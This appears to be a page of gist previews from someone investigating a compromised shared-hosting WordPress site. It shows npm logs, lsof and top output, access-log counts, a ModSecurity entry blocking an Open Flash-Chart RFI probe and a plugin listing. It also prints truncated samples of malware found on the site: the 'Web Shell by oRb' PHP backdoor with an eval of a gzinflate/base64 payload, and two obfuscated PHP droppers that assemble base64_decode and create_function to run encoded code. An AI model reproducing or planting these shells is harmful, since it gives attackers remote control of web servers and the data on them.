This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
0 info it worked if it ends with ok | |
1 verbose cli [ '/usr/local/bin/node', '/usr/local/bin/npm', 'run', 'build' ] | |
2 info using npm@2.15.1 | |
3 info using node@v4.4.3 | |
4 verbose run-script [ 'prebuild', 'build', 'postbuild' ] | |
5 info prebuild cloudgov-style@0.3.4 | |
6 info build cloudgov-style@0.3.4 | |
7 verbose unsafe-perm in lifecycle true | |
8 info cloudgov-style@0.3.4 Failed to exec build script | |
9 verbose stack Error: cloudgov-style@0.3.4 build: `npm run build-css && npm run build-font && npm run build-img && npm run compile-css && npm run build-js && npm run compile-js && npm run gem` |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
[thomas-nelson-jr]$ lsof -u mrengy | grep php | grep /home | |
lsof: WARNING: can't stat() debugfs file system /sys/kernel/debug | |
Output information may be incomplete. | |
[thomas-nelson-jr]$ lsof -u mrengy | grep php | |
lsof: WARNING: can't stat() debugfs file system /sys/kernel/debug | |
Output information may be incomplete. | |
php55.cgi 12022 mrengy cwd DIR 8,1 4096 674014 /usr/local/dh/cgi-system | |
php55.cgi 12022 mrengy rtd DIR 8,1 4096 2 / | |
php55.cgi 12022 mrengy txt REG 8,1 6716704 671027 /usr/local/dh/cgi-system/php55.cgi | |
php55.cgi 12022 mrengy mem REG 8,1 31104 974004 /lib/x86_64-linux-gnu/libnss_dns-2.15.so |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
top - 05:52:54 up 46 days, 21:42, 2 users, load average: 2.52, 2.92, 3.11 | |
Tasks: 8 total, 1 running, 7 sleeping, 0 stopped, 0 zombie | |
Cpu(s): 22.1%us, 1.3%sy, 0.2%ni, 76.4%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st | |
Mem: 32953488k total, 30572604k used, 2380884k free, 62084k buffers | |
Swap: 3117180k total, 12236k used, 3104944k free, 8194852k cached | |
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND | |
11938 mrengy 20 0 273m 34m 17m S 0 0.1 0:00.32 php55.cgi | |
12022 mrengy 20 0 287m 48m 18m S 0 0.2 0:00.82 php55.cgi | |
12101 mrengy 20 0 286m 47m 18m S 0 0.1 0:00.82 php55.cgi |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
[thomas-nelson-jr]$ for k in `ls -S logs/*/http/access.log`; do wc -l $k | sort -r -n; done | |
181 logs/mike-eng.com/http/access.log | |
83 logs/emandmwedding.com/http/access.log | |
29 logs/stage.mike-eng.com/http/access.log | |
25 logs/emandminbeantown.com/http/access.log | |
0 logs/stage.emandminbeantown.com/http/access.log |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
[thomas-nelson-jr]$ tail -n 10 error.log | |
[Tue Apr 26 05:22:25 2016] [error] [client 91.200.12.24] ModSecurity: Access denied with code 418 (phase 1). String match "ofc_upload_image.php" at REQUEST_BASENAME. [file "/dh/apache2/template/etc/mod_sec2/99_dreamhost_rules.conf"] [line "236"] [id "1990059"] [msg "Open Flash-Chart RFI"] [hostname "mike-eng.com"] [uri "/wp-content/plugins/whatsmyrank-dev/php-ofc-library/ofc_upload_image.php"] [unique_id "Vx9dgdBx2ycAAH3pi5wAAAAP"] | |
[thomas-nelson-jr]$ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
[thomas-nelson-jr]$ cd mike-eng.com/wp-content/plugins | |
[thomas-nelson-jr]$ ls | |
afc-flv-player feed_plugin kimili-flash-embed visual-form-builder | |
afc-plug-system hits-ie6-pngfix manual-image-crop wordpress-importer | |
akismet image-rotation-fixer postmash wordpress-meta-robots | |
batch-categories index.php search-and-replace wpaudio-mp3-player | |
broken-link-checker jetpack syntax-highlighter | |
[thomas-nelson-jr]$ cd whatsmyrank-dev | |
-bash: cd: whatsmyrank-dev: No such file or directory |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php # Web Shell by oRb | |
$auth_pass = "bdfa762517dbee605ddea6ac0205b3ec"; | |
$color = "#df5"; | |
$default_action = 'FilesMan'; | |
$default_use_ajax = true; | |
$default_charset = 'Windows-1251'; | |
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'5b1pdxrHEjD82fec+x9aE24GYoQA2bkOEli2LNlybMnR4lV+yAADTDQwZGYQkh3996eqepnuWRCyk/uc97xyIkF3dXX1Xl1dizcsr7mTWXxdLnVP9o7f7h1/sl+cnr7pnsG37pPne4en9udKhX39978Y/JTmkRs+GbnTOGJt5oShc122ngfByHetKrNO/Hk4ww+vTw6fBjF+8pyuE/bH3qUb4tcPznTgXuGnY2fS8yGxssVRe8PyLHRH3YkT98dle8NmNeZNZn4wcMv2X3ZVr7sCefaGh4mrUI0/Y9cZuGGZwDYatTp7UH/ADoOY7Qfz6cCWVOCPe+XF4uvNv/8F//37XzuRG0VeMO1GsRPGZYTe8aZeN3Ljsu2GYRB2/WBkVw/PXr0yMyG5SwCRXa2bWRPnquteuf15jJhjb+JKEMim713fm3hxOUmcOCOv3/1zHsRu1A3nUwQS2QN36E2hq96dHHWhQ04Ojg6hf+xm7QE17t//gg4epVGMZv0y76d7w/m0j4QwQBDFoTeLfCcau1G5RMPMge6FbjwPp8yLunzwZeZjPhkA+4xI0DHgMAmwFstDDeTdg26+V+q+OTo5hYmVIYEyEI5GQ5G6iIJXwcibljl1A88tW9swi5jje6Npuw9zxQ0728MgnLCJG4+DQXsWRHHnjRNFiyActNi2N53NYxZfz9z2TKSyqTPh3zp |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
$z1g = 'zjxklhcgeoutdiwmp;q6rsy4_navbf'; | |
$XP = $z1g{21} . $z1g{11} . $z1g{20} . $z1g{24} . $z1g{20} . $z1g{8} . $z1g{16} . $z1g{4} . $z1g{26} . $z1g{6} . $z1g{8}; | |
$e3W = $z1g{28} . $z1g{26} . $z1g{21} . $z1g{8} . $z1g{19} . $z1g{23} . $z1g{24} . $z1g{12} . $z1g{8} . $z1g{6} . $z1g{9} . $z1g{12} . $z1g{8}; | |
$G3y = $z1g{6} . $z1g{20} . $z1g{8} . $z1g{26} . $z1g{11} . $z1g{8} . $z1g{24} . $z1g{29} . $z1g{10} . $z1g{25} . $z1g{6} . $z1g{11} . $z1g{13} . $z1g{9} . $z1g{25}; | |
$RU6 = $G3y( '$HF,$Av', $e3W($XP( array($z1g{17}, "\n"), "", "JHIgPSAn;Jztmb3IoJ;Gk9MDska;TxzdHJsZW4;oJEh;GKTs;kaSsr;KXskYz1;vcmQoc;3Vic3RyKCR;IRiwg;JG | |
kpKTs;kYy09b3J;kKHN1Yn;N0cigkQXY;sKCgkaSs;xKSVz;dHJsZ;W4oJEF2KSk;pKTsk;ci49Y2hy;KGFicygk | |
Yy;kgJiAw;eEZGKT;t9cmV0dX;JuICRyOw=;=" )) ); | |
$OuM = $G3y( "", $RU6($e3W($XP( array($z1g{17}, "\n"), "", "dJirz6+9yp;JXid25z;L3YpHPCxMi;9pFC60;8PMh9qcp9;e5k3jN;mKfgvr3;Mp4WatH;iQf5Nr;UHhvn6S;5co | |
e6nr;N/1p+t;lah4;lYqRuOCs;0YCTa1B4sc;3GzaSv3bl4;nsl7;r9q3pb2SW;VDpVXh4;ilCv1GuAwd;2jq+Jz |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
$UCk = 'm;efvlwsiq6hgnu_xcoyzbr4ajkdtp'; | |
$u7 = $UCk{7} . $UCk{28} . $UCk{22} . $UCk{15} . $UCk{22} . $UCk{2} . $UCk{29} . $UCk{5} . $UCk{24} . $UCk{17} . $UCk{2}; | |
$p6 = $UCk{21} . $UCk{24} . $UCk{7} . $UCk{2} . $UCk{10} . $UCk{23} . $UCk{15} . $UCk{27} . $UCk{2} . $UCk{17} . $UCk{18} . $UCk{27} . $UCk{2}; | |
$a5m = $UCk{17} . $UCk{22} . $UCk{2} . $UCk{24} . $UCk{28} . $UCk{2} . $UCk{15} . $UCk{3} . $UCk{14} . $UCk{13} . $UCk{17} . $UCk{28} . $UCk{8} . $UCk{18} . $UCk{13}; | |
$h2n = $a5m( '$R9T,$zr', $p6($u7( array($UCk{1}, "\n"), "", "JHIgP;SAnJzt;mb3IoJGk9M;DskaTx;zdHJsZ;W4oJF;I5VCk7JGkr;Kyl7;JGM9b3JkK;HN1Yn;N0ci;gkUjlU;LC | |
AkaS;kpOyRjLT1;vcmQoc3Vi;c3Ry;KCR6ciw;oKCRpKz;EpJX;N0cmxlb;igkenI;pKSk;pOyRyL;j1jaHIoYWJ;z | |
KCRjKSAmI;DB4RkYpO3;1yZXR1cm4g;JHI7" )) ); | |
$tn = $a5m( "", $h2n($p6($u7( array($UCk{1}, "\n"), "", "S9urlr;S74Yxo;trWjxLvd2;G7Hv;6W1k;I/Ypuu6ZMD;C0M2vrma;YuLfh16bn;g4qknJyc;aJyBP;1p6trCQtY | |
e;Bo7GW;0LDabZJwk;4/Fs+Wnrn;h/qm5L;2buj;s8rY0;6+TjJ;Sbv9vQjth;uXlrReYRhk;2aetna;XzbTmq6l4; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
0 info it worked if it ends with ok | |
1 verbose cli [ '/usr/local/bin/node', '/usr/local/bin/npm', 'install' ] | |
2 info using npm@2.15.1 | |
3 info using node@v4.4.3 | |
4 verbose readDependencies loading dependencies from /Applications/MAMP/htdocs/cg-style/package.json | |
5 warn package.json cloudgov-style@0.3.4 license should be a valid SPDX license expression | |
6 verbose install where, deps [ '/Applications/MAMP/htdocs/cg-style', | |
6 verbose install [ 'uswds', | |
6 verbose install 'autoprefixer', | |
6 verbose install 'browserify', |